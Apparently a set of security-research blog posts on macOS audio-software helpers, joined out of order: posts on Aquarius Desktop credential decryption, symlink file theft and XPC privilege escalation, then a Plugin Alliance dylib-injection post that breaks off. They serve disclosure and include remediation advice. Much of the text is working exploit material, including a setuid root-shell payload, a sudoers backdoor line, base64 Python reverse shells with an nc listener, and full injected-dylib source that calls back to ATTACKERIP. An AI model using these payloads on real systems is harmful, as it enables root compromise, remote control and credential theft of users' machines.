Introduction

Welcome back!

This is post 2 of 3 in my security review of the Aquarius Desktop application.

After finding the local privilege escalation vulnerability in the Aquarius Desktop’s HelperTool XPC service, I continued digging into the application’s security design. This time, the focus shifted from privilege escalation to how the application handles authentication and persistence and what I found was equally concerning.

In this second part of my Aquarius Desktop analysis, I discovered that the app stores user credentials in a local configuration file (aquarius.settings) using weak encryption and without any device binding or integrity checks. This design allows an attacker to either exfiltrate the file to gain full account access on another machine, or decrypt the stored password entirely offline using a simple script.

While this mechanism appears to have been implemented to improve usability which enables producers to access their plugins across multiple systems, it ultimately introduces a severe account takeover risk. In this post, I’ll break down how the vulnerability works, why the encryption fails to protect users, and how it can be remediated without sacrificing convenience for legitimate users.

Vulnerability Overview

Now, this vulnerability is quite interesting. The Aquarius Desktop application stores user authentication data in a file called aquarius.settings located at:

~/Library/Application Support/Aquarius/aquarius.settings

This file includes sensitive fields such as:

<USERNAME>
<OLDUSERNAME>
<PASSWORD>
[...]

The problem lies in how this file is handled:

• It is not cryptographically bound to the device.
• It lacks integrity validation, making it fully portable.
• The user’s password is encrypted with a static Blowfish key and ECB mode, allowing offline decryption.

For the account takeover via file import, an attacker with access to the aquarius.settings file (via local access, malware, or chaining with the previous LPE exploit) can simply copy it to another machine, relaunch Aquarius Desktop, and gain full authenticated access to the victim’s account without ever needing their credentials.

The app assumes that the presence of this file means the user is already authenticated so it restores the session without checking anything.

Think of it this way… anyone with access to the aquarius.settings file can take over your account. All they need is the encrypted string from the <PASSWORD> field because Aquarius “protects” it using a static Blowfish key hardcoded directly in the binary:

potkseD suoirauqA

This key is embedded in the binary and can be extracted via dynamic analysis (e.g., LLDB, etc). Because the Blowfish implementation uses ECB mode without any salt or IV, and the key isn’t tied to a specific user or device, the encryption is completely reversible.

I developed a Python script that:

• Takes the base64-encoded string from aquarius.settings
• Applies the static Blowfish key
• Reverses 32-bit endianness (a quirk of how JUCE structures its data)
• Outputs the original password in plaintext

This allows for offline password cracking in seconds, potentially enabling credential reuse across services if the same password is used elsewhere.

Proof of Concept

The password value in aquarius.settings is encrypted using a statically derived Blowfish key. Dynamic analysis with LLDB and disassembly of the juce::BlowFish::encrypt / decrypt methods confirmed the use of Blowfish in ECB mode with a hardcoded key. The password is encrypted and base64-encoded before being stored. We can set a breakpoint at juce::BlowFish::encrypt to revealed key input during runtime. Then, analysis of decrypted output revealed fixed 32-bit word reordering (endianness swap) and this mean the Blowfish key was static and not derived per user or per machine.

Looking at the LLDB debugging session, we can hit the breakpoint by triggering the juce::BlowFish::encrypt function. At the time of execution, register x21 holds the encryption key used by the application “potkseD suoirauqA”. This is the static hardcoded Blowfish key for encryption operations. Also, registers x22 and x23 point to the cipher’s initialized S-box and P-array structures, showing that standard Blowfish internals are in use.

With the key pulled from memory (potkseD suoirauqA), I was able to decrypt the password stored in aquarius.settings using a short Python script that mirrors the app’s Blowfish routine. The script takes the base64-encoded string, applies the static key, and returns the original password in plain text all without needing access to the original device. If someone gets a copy of this file, they can recover the user’s password in seconds.

I intentionally used a long, messy password with spaces and symbols to prove that it doesn’t matter. Any password gets decrypted the same way.

python3 poc_cracking.py -p “Yf21qsqdjAeVYVdclDSAEfoaG2Ck8HdIyQPdnhg4/sSpHlcmWLR1BUd6NkYj7V6a74PR2VC/6QE=“ -k “potkseD suoirauqA” -a

Once you have the password, you can log in as the user with full access to their account, plugins, downloads, and anything else linked to it.

This can be chained with the HelperTool XPC Service Local Privilege Escalation in Aquarius Desktop macOS to extract the aquarius.settings file.

Remediation

To fix this issue without breaking usability, Aquarius Desktop should stop storing user passwords locally even in encrypted form. Instead, the application should:

• Use device-bound session tokens: Replace stored passwords with short-lived authentication tokens that are cryptographically tied to the device they were issued on. If the aquarius.settings file is copied to another system, the token should become invalid.
• Adopt secure token storage: On macOS, use the Keychain to store sensitive authentication material. On Windows, use DPAPI. Never store secrets in plaintext files within user-writable directories.
• Implement integrity checks: Add digital signatures or HMAC verification for local auth files. This would make tampering or reuse across systems detectable and prevent silent account takeover.
• Leverage OAuth or refresh token flow: If cross-device access is required, use an authentication flow that allows secure re-authentication (e.g. OAuth2 + refresh tokens) rather than persisting long lived credentials.

These changes would preserve the current usability benefits (seamless plugin access across systems) while removing the risk of file based account takeover and offline password cracking.

Disclosure timeline

Introduction

Welcome back!

This is post 3 of 3 in my security review of the Aquarius Desktop application.

After finding the local privilege escalation in the HelperTool service and a weak-encryption credential flaw in aquarius.settings, I shifted my attention to another part of the application’s design: how Aquarius handles logs, diagnostics, and its “Create support data file” feature.

What I found was another security issue and this time concerned the filesystem.

In this third and final part of my analysis, I discovered that Aquarius Desktop blindly follows symbolic links inside its log directory (~/Library/Logs/Aquarius). Because these paths are never validated, an attacker can plant a malicious symlink and coerce the application into reading any file on the system and bundling it into the support ZIP archive. This turns a routine diagnostic feature into a file exfiltration vector.

Although this behavior was likely implemented to simplify debugging and support workflows, the lack of path sanitization introduces a local security risk. In this post, I’ll walk through how the vulnerability works, how it can be exploited in practice, and what changes Acustica can make to harden the application without disrupting support operations.

Vulnerability Overview

The application have this feature called “Create support data file”. This feature mechanism bundles logs and diagnostic files into a ZIP archive before sending them to Acustica support in case it’s requested by them.

The problem with this feature is that Aquarius Desktop blindly follows symbolic links (symlinks) inside its log directory and includes whatever they point to in the generated support archive. Combined with the fact that the application writes ZIP files without using O_NOFOLLOW, this creates a symlink traversal and data exfiltration path.

Let’s go through the flow:

Log Folder Resolution

The base log directory is obtained through juce::FileLogger::getSystemLogFileFolder, which hardcodes the path to the user’s logs folder:

void juce::FileLogger::getSystemLogFileFolder(undefined8 *param_1)
{
    // Construct base path string "~/Library/Logs"
    *local_28 = 0x72617262694c2f7e;                // "~ / L i b r a r"
    *(int *)(puVar2 + 3) = 0x6f4c2f79;             // "y / L o"
    *(undefined2 *)((long)puVar2 + 0x1c) = 0x7367; // "g s"
    *(undefined1 *)((long)puVar2 + 0x1e) = 0;

    // Parse the absolute path into a juce::File
    juce::File::parseAbsolutePath(param_1, &local_28);
}

This confirms that Aquarius directly targets ~/Library/Logs as the root location for logs to include in the support archive.

File Enumeration with Symlink Following

Within SupportTab::prepareSupportArchive, Aquarius uses JUCE’s directory iterator to walk through log files:

// Ghidra decompile (~line 373)
juce::RangedDirectoryIterator iter(logDir, true, "*.log", 0);

The second argument (true) corresponds to JUCE’s followSymlinks parameter. This instructs the iterator to traverse symbolic links as though they were regular files. Any attacker‑controlled symlink planted inside ~/Library/Logs/Aquarius will be followed and resolved to its target, regardless of location or sensitivity.

File Inclusion into ZIP Archive

Files collected by the iterator are subsequently added to a support ZIP using juce::ZipFile::Builder:

// Multiple call sites in prepareSupportArchive()
juce::ZipFile::Builder::addFile(file, compressionLevel, relativePath);

Each File object is built from absolute paths parsed earlier with juce::File::parseAbsolutePath, which performs no checks against symlinks or device nodes.

ZIP Creation and Write Sink

When it’s time to finalize the archive, Aquarius writes the ZIP with JUCE’s FileOutputStream:

// Ghidra decompile (~line 363)
juce::FileOutputStream out(zipFile, 0x4000);

While this happens, JUCE invokes the macOS open() system call with flags like:

O_WRONLY | O_CREAT | O_TRUNC

The O_NOFOLLOW is not used. This means that if the output path is a symlink, the OS will transparently dereference it. Combined with symlink following during enumeration, this creates a lack of path validation. According to Apple’s documentation (FileDescriptor.OpenOptions.noFollow), this option make sure that open() fails if the target is a symbolic link. By default, Aquarius uses O_CREAT | O_WRONLY | O_TRUNC, which permits transparent symlink traversal.

Proof of Concept

To demonstrate the impact of the symlink vulnerability, I developed a simple PoC attack against the Aquarius Desktop application’s “Create support data file” feature. By abusing insecure log handling, the PoC shows that arbitrary files can be exfiltrated into the generated ZIP archive.

So first step is to prepare a “malicious” symlink.

I created a symbolic link inside Aquarius’s log directory pointing to a sensitive system file.

ln -s /etc/passwd ~/Users/[user]/Library/Logs/Aquarius/poc.log

Here, poc.log is a symlink to /etc/passwd

Next, it’s just a matter of clicking on the “Create support data file” feature in the application.

This calls SupportTab::prepareSupportArchive(), which collects log files from ~/Library/Logs/Aquarius and bundles them into a ZIP archive (AquariusSupport-2025-[DATE].zip).

Now, during the archive creation, the juce::RangedDirectoryIterator traverses the symlink (poc.log) and resolves it to /etc/passwd and juce::ZipFile::Builder::addFile() includes the dereferenced file in the archive.

The final ZIP archive, generated in Aquarius’s working directory, contains /etc/passwd under the name poc.log.

We can simply extract it:

unzip aquariusSupport-2025-[DATE].zip
cat Logs/poc.log

The fun part.

Assuming the attacker already gained a foothold via the HelperTool XPC service Privilege Escalation vulnerability, he can spawn an interactive shell by running python3 -c 'import pty; pty.spawn("/bin/bash")' and then navigate into the Aquarius log directory (~/Users/[user]/Library/Logs/Aquarius) and plant a malicious symbolic link pointing to a sensitive file such as /etc/passwd. When the victim subsequently triggers the “Create support data file” feature from the application’s Help menu, the vulnerable prepareSupportArchive() routine follows the attacker’s symlink and includes the contents of /etc/passwd inside the generated support ZIP. The attacker can then simply extract the archive and read the sensitive file under the attacker controlled name poc.log.

Reading the /etc/passwd file is as simple as running cat /Logs/poc.log

Remediation

There’s various ways that the Aquarius support archive feature can be hardened to prevent symlink abuse and arbitrary file disclosure.

• Disable Symlink Following using juce::RangedDirectoryIterator with followSymlinks = false to make sure that only real files are enumerated in the log directory.
• Perform Path Validation before adding any file into the ZIP, validate it with lstat() / fstat() to confirm it is a regular file (S_IFREG) located strictly within ~/Library/Logs/Aquarius.
• Reject symlinks, hardlinks, device nodes, or paths that escape the intended directory. Use O_NOFOLLOW for File Opens where FileOutputStream or equivalent APIs are used, open files with O_NOFOLLOW (Swift: .noFollow) to prevent transparent dereferencing of symlinks. Apple’s documentation explicitly recommends this for secure file operations.
• Limit the support ZIP contents to a fixed allowlist of expected log files, rather than zipping the entire directory. This prevents attackers from introducing unexpected files or symlinks
• Add a warning to the user when the support archive contains unexpected or non‑standard files.

Disclosure timeline

Introduction

This is post 1 of 3 in my security review of the Aquarius Desktop application.

As an independent security researcher and avid user of the Acustica Audio plugins, I decided to do a security audit of Acustica Audio’s Aquarius Desktop application. During my research, I discovered a several vulnerabilties. This post is the first in a three part series detailing those findings.

In this part, I focus on a local privilege escalation affecting Aquarius Desktop’s HelperTool XPC service on macOS. This issue allows an unprivileged local user to execute arbitrary code with elevated privileges due to insecure interprocess communication (XPC) handling.

Although the HelperTool is intended to perform legitimate privileged actions such as installing or updating plugins, it fails to properly validate client requests. This oversight enables attackers to exploit the mechanism and escalate privileges to root.

This vulnerability is part of a larger set of design flaws I identified within the Aquarius Desktop ecosystem, particularly around privilege escalation and credential storage. In this post, I’ll walk through the technical analysis of the LPE, provide a proof of concept (PoC), and offer recommendations for remediation.

Vulnerability Overview

The HelperTool is a privileged macOS XPC service bundled with the Aquarius Desktop application. Its purpose is to handle system level operations such as installing audio plugin components, managing licenses, and modifying protected directories that require administrative privileges.

During testing, I noticed that the HelperTool service was exposing a publicly accessible XPC interface that fails to properly authenticate the calling process. As a result, any local user on the system can send arbitrary messages to the HelperTool, causing it to execute privileged actions on their behalf.

This misconfiguration leads to a Local Privilege Escalation (LPE). An attacker with standard user permissions could exploit this flaw to gain root access or modify protected system files bypassing macOS’s security model.

Technical analysis

Now, let me explain why the HelperTool is vulnerable, what I observed while reversing it, and why the flaw leads to local privilege escalation.

The Aquarius HelperTool is implemented as a privileged XPC service that runs with elevated privileges (the helper binary is installed and launched by the main application/installer). The helper exposes XPC methods intended to perform privileged operations on behalf of the main process (for example: install or remove files under protected locations, write license files, run installer commands or update the application).

During static and dynamic analysis I observed two primary implementation mistakes that together enable the escalation.

The helper accepts incoming XPC messages without verifying the identity or privileges of the caller. Proper XPC security normally relies on checking the caller’s audit token (e.g. audit_token_t) to confirm the bundle identifier or PID matches an expected trusted client or using Authorization Services / SMJobBless style mechanisms where only a signed and authorized process may request privileged operations.

In this helper, the code path that handles incoming requests does not perform an authorization check. Any local process that can connect to the helper’s Mach/XPC service is treated as trusted and may request privileged actions.

Also, the helper constructs command strings and forwards them to the system shell (or otherwise executes them) using APIs that are unsafe when supplied untrusted input. Concatenating user controlled data into a string passed to system() (or equivalent) allows an attacker to inject shell syntax and control execution flow… which turns the XPC method into a remote command execution when the caller is able to send arbitrary arguments.

Combined with the previous issue (no client authentication), this creates a path where a local, unprivileged user can trigger the helper to execute arbitrary commands with the elevated privileges of the helper process.

Insecure XPC Connection Handling

The HelperTool service registers an XPC listener and relies on listener:shouldAcceptNewConnection: to determine whether to allow new clients. In a secure design, this function should enforce strong client validation to verify the connecting process’s code signature, bundle identifier, or Team ID via the audit token.

/* @class HelperTool */
-(int)listener:(int)arg2 shouldAcceptNewConnection:(int)arg3 {
    [arg3 retain];
    NSLog(@"Acustica Helper Tool::shouldAcceptNewConnection");
    
    r21 = [[NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)] retain];
    [r20 setExportedInterface:r21];
    [r21 release];
    
    [r20 setExportedObject:arg0];
    [r20 resume];
    [r20 release];
    
    return 0x1; // Always accepts
}

No Client Authentication

The function checks only that listener == self.listener and that the newConnection object is non‑null. Beyond these checks, no verification of the connecting process is performed.

No Audit Token Validation

macOS provides an audit token on each XPC connection that includes the client’s PID, UID, GID, and code‑signing identity. Secure services (e.g., Apple’s own privileged helpers) use this to ensure only trusted, signed clients can connect. This helper completely ignores the audit token.

Exposed Privileged Interface

As soon as a connection is accepted, the service immediately sets its exported interface to HelperTool and resumes the connection. This makes the entire privileged API surface accessible to any local process, malicious or not.

Because there is no authentication barrier, any local process can connect to the HelperTool service and invoke its privileged methods. Combined with the broken checkAuthorization: logic, this reduces the attack surface to “any user → root” with essentially no friction.

Broken Authorization Logic

The helper attempts to enforce authorization using Apple’s Security.framework, but the implementation is flawed. Below is the relevant decompiled code from checkAuthorization:command:

/* @class HelperTool */
-(int)checkAuthorization:(NSData *)authData command:(int)cmd {
    if (cmd == 0x0) {
        __assert_rtn("command != nil");
    }

    if (authData == nil || [authData length] != 0x20) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:-50 userInfo:nil];
    }

    if (AuthorizationCreateFromExternalForm([authData bytes], &authRef) != errAuthorizationSuccess) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:cmd userInfo:nil];
    }

    // Retrieves the authorization right string for the requested command
    const char *right = [[Common authorizationRightForCommand:cmd] UTF8String];
    if (right == NULL) {
        __assert_rtn("oneRight.name != NULL");
    }

    // AuthorizationCopyRights is called with NULL reference
    OSStatus result = AuthorizationCopyRights(NULL, &rights, NULL, kAuthorizationFlagDefaults, NULL);
    if (result != errAuthorizationSuccess) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:result userInfo:nil];
    }

    return 0; // Authorization check passes
}

Superficial Input Validation

The function checks that authData is 32 bytes (0x20) long, which corresponds to an AuthorizationExternalForm. However, this validation is syntactic only. It does not verify that the token is genuine or unexpired.

Broken Authorization Reference

Even if AuthorizationCreateFromExternalForm succeeds, the code never actually uses the resulting AuthorizationRef. Instead, it calls AuthorizationCopyRights with a NULL pointer:

AuthorizationCopyRights(NULL, &rights, NULL, flags, NULL);

Passing NULL here effectively skips validation and results in the function returning success regardless of the caller’s privileges.

Assertions Instead of Enforcement

The code contains multiple calls to __assert_rtn(...) for critical conditions (command != nil, oneRight.name != NULL). In release builds, these assertions are either stripped out or only generate runtime exceptions if triggered. They do not provide meaningful security enforcement.

This means that any local client can present any blob resembling an external authorization form (or even bypass this entirely) and still pass the check. The helper effectively grants root level privileges without requiring a valid AuthorizationRef or rights…

Unsafe Command Execution in executeCommand:authorization:withReply:

The most critical flaw lies in the HelperTool’s executeCommand:authorization:withReply: method. Decompiled code shows the following flow:

/* @class HelperTool */
-(int)executeCommand:(NSString *)cmd
       authorization:(NSData *)authData
           withReply:(id)reply {
    
    NSArray *parts = [cmd componentsSeparatedByString:@","];
    NSMutableArray *args = [[NSMutableArray alloc] initWithArray:parts];
    [args removeObjectAtIndex:0];
    
    id authCheck = [self checkAuthorization:authData command:cmd];
    if (authCheck == nil) {
        NSTask *task = [[NSTask alloc] init];
        NSString *launchPath = [parts objectAtIndex:0]; // attacker‑controlled
        
        [task setLaunchPath:launchPath];
        [task setArguments:args]; // attacker‑controlled
        [task setStandardOutput:[NSPipe pipe]];
        [task setStandardInput:[NSPipe pipe]];
        [task launch]; // runs as root
    }
    
    NSLog(@"Acustica Helper Tool protocol::executeCommand: %@", cmd);
    reply(authCheck, @"Authorization failed.");
}

Broken Authorization Dependency

The function first calls checkAuthorization:command:, but as shown earlier this routine always succeeds due to its NULL AuthorizationCopyRights usage. In practice, every request passes the authorization step.

Attacker‑Controlled Launch Path and Arguments

The function splits the incoming cmd string on commas, takes the first element as the binary path, and the remaining elements as arguments. No sanitization or whitelisting is applied. Any local attacker can supply arbitrary binaries (e.g. /bin/bash) and arguments.

Execution Sink via NSTask

The attacker‑supplied path is passed directly to NSTask setLaunchPath: and invoked with [task launch]. Because the HelperTool runs as a privileged launchd daemon, this code executes with root privileges!

@"/bin/sh,-c,cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"

The HelperTool executes this as root and create a setuid root shell at /tmp/rootbash. Any user can then run this command below to obtain a persistent root shell:

/tmp/rootbash -p

The game plan is this:

We know that any local process can connect to the privileged HelperTool service because shouldAcceptNewConnection: unconditionally accepts all connections without validation. Thebn, the broken checkAuthorization: function always returns success. It never enforces a valid AuthorizationRef, so every caller is granted access to privileged functionality. Finally, we can invokes executeCommand:authorization:withReply: with malicious arguments. Input is used directly in [task setLaunchPath:] / [task setArguments:] and then executed via [task launch], running with root privileges.

This mean we can just craft a quick exploit so any local user can perform a one shot Local Privilege Escalation (LPE), gaining full root access on affected macOS systems!

Proof of Concept (PoC)

To demonstrate the impact of the vulnerability, I developed a fully working exploit targeting the com.acustica.HelperTool XPC service. This exploit chains together all the flaws observed above to achieve arbitrary command execution with root privileges.

The exploit is implemented as a standalone Objective‑C client. I used the Apple’s NSXPCConnection APIs, to communicates directly with the vulnerable HelperTool service and bypass intended access controls and invoke privileged functionality.

Exploit Steps

1. The exploit creates an AuthorizationRef and serializes it to an AuthorizationExternalForm blob. Due to the flawed checkAuthorization:command: implementation, any blob of the correct length is accepted as valid, even though no real rights are granted.
2. An NSXPCConnection is created to the Mach service com.acustica.HelperTool with NSXPCConnectionPrivileged. Because shouldAcceptNewConnection: always returns YES without validating the client’s audit token, the connection succeeds from any local process.
3. The exploit invokes the executeCommand:authorization:withReply: method with crafted payloads. The first comma separated token becomes the binary path and subsequent tokens become arguments. These values are passed directly into [NSTask setLaunchPath:] and [NSTask setArguments:], then launched as root.

The root shell payload creates a setuid root shell at /tmp/rootbash.

@"/bin/sh,-c,cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"

Now we can create a sudo backdoor which grant passwordless sudo access to all users in the staf group:

@"/bin/sh,-c,echo 'staff ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"

We can even push further with a full reverse shell running with full root privs:

@"/bin/sh,-c,echo '<base64-encoded python reverse shell>' | base64 -d | python3"

Exploitation

Now the fun part.

1. We compile the exploit:

   gcc -framework Foundation -framework Security acusticaexploit.m -o acusticaexploit
   

2. We run it!

   ./acusticaexploit
   

Note on Authorization Handling: The PoC may log a failure when attempting to create a valid AuthorizationRef using Apple’s Security.framework APIs (e.g., AuthorizationCreate returning an error). This is expected and does not impact exploitability. The issue lies in the HelperTool’s flawed implementation of checkAuthorization:, which only verifies that the supplied blob is 32 bytes long and then ignores the actual AuthorizationRef. Because of this, any 32‑byte blob is treated as valid authorization. In practice, this means the helper grants access even when no legitimate authorization has been established, which is why the exploit continues successfully despite the “Failed to create authorization” message.

Now, the exploitation success can be confirmed various methods. Beyond privilege escalation through creation of a setuid root shell, the vulnerability can be leveraged to obtain a fully interactive root shell over the network…

We can use a Python reverse shell payload that’s base64‑encoded and injected through the vulnerable executeCommand:authorization:withReply: method:

echo
'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoInJlZGFjdGVkIiwxMzM3KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw==' \ | base64 -d | python3; echo "

We can start a Netcat listener on our attack machine running macOS Sonoma:

nc -vl 1337

Once the payload executed on the target, the listener received an incoming connection and provided a fully interactive root shell:

System Log Verification

To validate exploitation, I monitored the system logs for the vulnerable helper service while running the exploit. Using the log stream command with an appropriate predicate, we can observe the HelperTool processing our supplied input and launching commands as root:

sudo log stream --predicate 'process == "HelperTool" OR process == “com.acustica.HelperTool"' --level debug

Log entries show the service accepting unprivileged client connections and invoke the unsafe command execution path.

The HelperTool unconditionally accepting new XPC connections

com.acustica.HelperTool: Acustica Helper Tool::shouldAcceptNewConnection

The flawed authorization path being hit:

com.acustica.HelperTool: Acustica Helper Tool::checkAuthorization

Attacker‑supplied payloads being executed via the vulnerable command handler:

com.acustica.HelperTool protocol::executeCommand: /bin/sh,-c,cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
com.acustica.HelperTool protocol::executeCommand: /bin/sh,-c,echo 'staff ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
com.acustica.HelperTool protocol::executeCommand: /bin/sh,-c,echo '<base64 reverse shell>' | base64 -d | python3; echo

Remediation

To mitigate this, implement strong client verification controls for all XPC connections. This should include validating the connecting client’s code signature and using the audit token for identity checks, as relying solely on the process ID (PID) is not secure. An example of a robust implementation can be found here project.

In addition, ensure that the hardened runtime is enabled and restrict the use of sensitive entitlements. In particular, entitlements such as:

• com.apple.security.cs.disable-library-validation
• com.apple.security.cs.allow-dyld-environment-variables
• com.apple.private.security.clear-library-validation

Should be avoided unless absolutely required, as they can significantly weaken binary integrity protections. To mitigate command injection vulnerabilities, all command arguments must be strictly validated and safely escaped before execution.

Disclosure timeline

Introduction

This is post 1 of 2 in my security review of the Plugin Alliance Installation Manager.

Hello!

In this post I want to walk you through a fun little vulnerability I found while poking around the Plugin Alliance InstallationHelper on macOS.

If you’ve never looked at it before, it’s basically a small background tool that steps in when the Plugin Alliance app needs to install or update something. Because macOS locks down a lot of system locations, the main app can’t just drop files wherever it wants so this helper runs as root and handles the “privileged” parts of the install process for it.

In other words, it’s the thing actually putting files in protected directories, setting permissions, and doing the behind the scenes work that normal apps aren’t allowed to do. And, as you can imagine, anything that runs as root is worth a closer look.

I wanted to see how well it held up against local attacks. It’s a privileged component, so if anything goes wrong here, the impact can get serious fast.

The InstallationHelper from Plugin Alliance isn’t protected by hardened runtime, it has no __RESTRICT segment, and its entitlements are wide open. That combination leaves the door open for dylib injection.

It was possible to exploit DYLD_INSERT_LIBRARIES, I was able to get the helper to load a malicious library. The PoC showed that a normal local user could trigger the helper and run arbitrary code (though still partially limited by SIP).

This article breaks down how the issue works, how I found it, and how it can be exploited in practice.

Let’s go!

Vulnerability Overview

So we know that the Plugin Alliance InstallationHelper is running as root, but it’s missing several protections that macOS normally expects from privileged binaries. These protections exist to prevent things like dylib injection, so their absence opens the door to some interesting attack paths.

The first issue shows up before we even get into dynamic loading. The binary simply doesn’t include a __RESTRICT segment.

macOS uses the __RESTRICT segment (and its accompanying __restrict section) to lock down how a binary interacts with dynamic libraries. When this segment is missing, the system won’t enforce certain restrictions around library loading, which becomes dangerous for processes running as root.

A quick otool check confirms the absence:

$ otool -l com.plugin-alliance.pa-installationhelper | grep __RESTRICT

Since the binary lacks a __RESTRICT segment, macOS doesn’t block DYLD_* environment variables. That alone already opens the door for library injection, but the situation gets worse when we look at the Mach-O header.

Running otool on the helper shows its runtime flags:

$ otool -hv /Library/PrivilegedHelperTools/com.plugin-alliance.pa-installationhelper

One thing stands out immediately the HARDENED_RUNTIME flag is completely missing.

Little backstory… Apple introduced hardened runtime back in macOS Mojave to enforce stricter code-signing rules, library validation, and to prevent exactly this kind of DYLD based injection. Without it, the system trusts whatever libraries the process loads even if they come from attacker controlled paths.

So at this point, we have a root privileged binary that doesn’t restrict DYLD variables, doesn’t validate injected libraries and can be influenced by an unprivileged user

Before looking at exploitation paths, it’s worth checking how the helper is signed. Code signing configuration is supposed to tell macOS what a binary is allowed to do at runtime. Things like whether it should enforce hardened runtime, whether it validates loaded libraries, and whether its resources are sealed. For privileged tools, these settings are a major part of preventing injection attacks (like this one).

Running codesign on the InstallationHelper gives us its signing details:

$ codesign -dvvv /Library/PrivilegedHelperTools/com.plugin-alliance.pa-installationhelper

The binary is signed with Plugin Alliance’s Developer ID certificate, but that’s about all it has going for it. There’s no hardened runtime, no library validation, and no resource sealing. Without those protections, the signature doesn’t actually stop the helper from loading untrusted code. Even though the binary has a valid Developer ID, macOS isn’t enforcing any of the security features that would normally matter for preventing injection.

Next, I checked the helper’s entitlements to see whether it was explicitly requesting anything risky.

The output is basically empty:

$ codesign --display --entitlements - /Library/PrivilegedHelperTools/com.plugin-alliance.pa-installationhelper

There are no dangerous entitlements like disable-library-validation or allow-dyld-environment-variables, which is good but unfortunately, it doesn’t help much in this case.

Entitlements only matter if hardened runtime is enabled, because that’s what makes macOS enforce things like library validation in the first place. Since hardened runtime is missing entirely, the lack of dangerous entitlements doesn’t prevent DYLD injection. Combined with the missing __RESTRICT segment, the helper remains fully exposed.

So even though the entitlement set is minimal, the real protections that would have mattered simply aren’t there.

Proof of Concept

To verify that the dylib injection was exploitable, I built a simple PoC setup. The goal was to force the InstallationHelper to load a malicious dynamic library using DYLD_INSERT_LIBRARIES.

The PoC used three small components:

1. Malicious dylib
   This library includes a constructor function that runs automatically as soon as it’s loaded. The constructor writes basic process information (PID, UID, EUID, etc.) to a file in /tmp so it’s easy to confirm when the code has executed inside the helper’s context. I also had the dylib attempt an outbound connection to a controlled VM just to show that arbitrary code was indeed running inside the helper’s context.
2. A minimal XPC client
   The helper is triggered through an XPC interface, so the PoC includes a tiny client that simply connects to the com.plugin-alliance.pa-installationhelper service. Connecting is enough to cause the helper to launch, which gives us a reliable execution point.
3. An execution step that sets DYLD_INSERT_LIBRARIES
   When launching the XPC client, the environment variable is set to point at the malicious dylib. Because the helper lacks hardened runtime and has no __RESTRICT segment, the dynamic loader doesn’t block this, and the helper is started with the injected library attached.

Malicious dylib

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <syslog.h>
#include <libproc.h>
#include <stdlib.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
    FILE *f = fopen("/tmp/dylib_python_shell", "w");
    if (f) {
        fprintf(f, "=== DYLIB PYTHON SHELL ATTEMPT ===\n");
        fprintf(f, "PID: %d\n", getpid());
        fprintf(f, "UID: %d\n", getuid());
        fprintf(f, "EUID: %d\n", geteuid());

        // Attempt Python reverse shell using base64 encoding
        fprintf(f, "Attempting Python reverse shell...\n");

        system(“echo
'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5F
VCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIkFUVEFDS0VSSVAiLDEzMzcpKTtvcy5kd
XAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKS
wyKTtzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7' | base64 -d
| python3 &");

        fprintf(f, "Python reverse shell command executed\n");
        fclose(f);
    }

    printf("[+] Python shell dylib constructor called\n");
    syslog(LOG_ERR, "[+] Python shell dylib constructor called\n");
}

XPC Client

To trigger the vulnerable helper, I used a lightweight Objective-C XPC client. The client doesn’t need to perform any privileged actions.Simply connecting to the service is enough to make the InstallationHelper launch, which in turn loads the injected dylib.

The client connects to the helper’s Mach service and invokes a harmless method (getVersionWithReply:). This is just a convenient way to create activity inside the helper so it loads normally, giving the injected dylib a chance to execute its constructor.

#import <Foundation/Foundation.h>

static NSString* XPCHelperMachServiceName = @"com.plugin-alliance.pa-installationhelper";

@protocol InstallationHelperProtocol
- (void)getVersionWithReply:(void (^)(NSString *))v1;
@end

int main(void) {
    @autoreleasepool {
        NSLog(@"[+] Testing dylib injection with service connection...");

        // Connect to service (triggers dylib injection)
        NSXPCConnection* connection = [[NSXPCConnection alloc]
            initWithMachServiceName:XPCHelperMachServiceName options:0x1000];

        NSXPCInterface* interface =
            [NSXPCInterface interfaceWithProtocol:@protocol(InstallationHelperProtocol)];

        [connection setRemoteObjectInterface:interface];
        [connection resume];

        id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
            NSLog(@"[-] Connection failed: %@", error);
        }];

        NSLog(@"[+] Connected to service successfully!");

        // Trigger service activity
        [obj getVersionWithReply:^(NSString *version) {
            NSLog(@"[+] Service version: %@", version);
        }];

        [NSThread sleepForTimeInterval:2.0f];

        NSLog(@"[+] Test complete. Check for dylib injection artifacts.");
    }
    return 0;
}

To demonstrate the injection, the dylib is pre-loaded into the privileged helper by setting DYLD_INSERT_LIBRARIES before running the client:

DYLD_INSERT_LIBRARIES="$(pwd)/injection_dylib.dylib" ./dylib-injection

Now, on modern macOS, SIP normally strips DYLD_* variables when launching system services. But because the InstallationHelper binary lacks hardened runtime and has no __RESTRICT segment, macOS doesn’t block or validate the injected library. As a result, the helper launches with the malicious dylib attached, and the constructor executes inside a root-owned process during the XPC interaction.

Once the dylib ran, it made an outbound connection back to the listener!

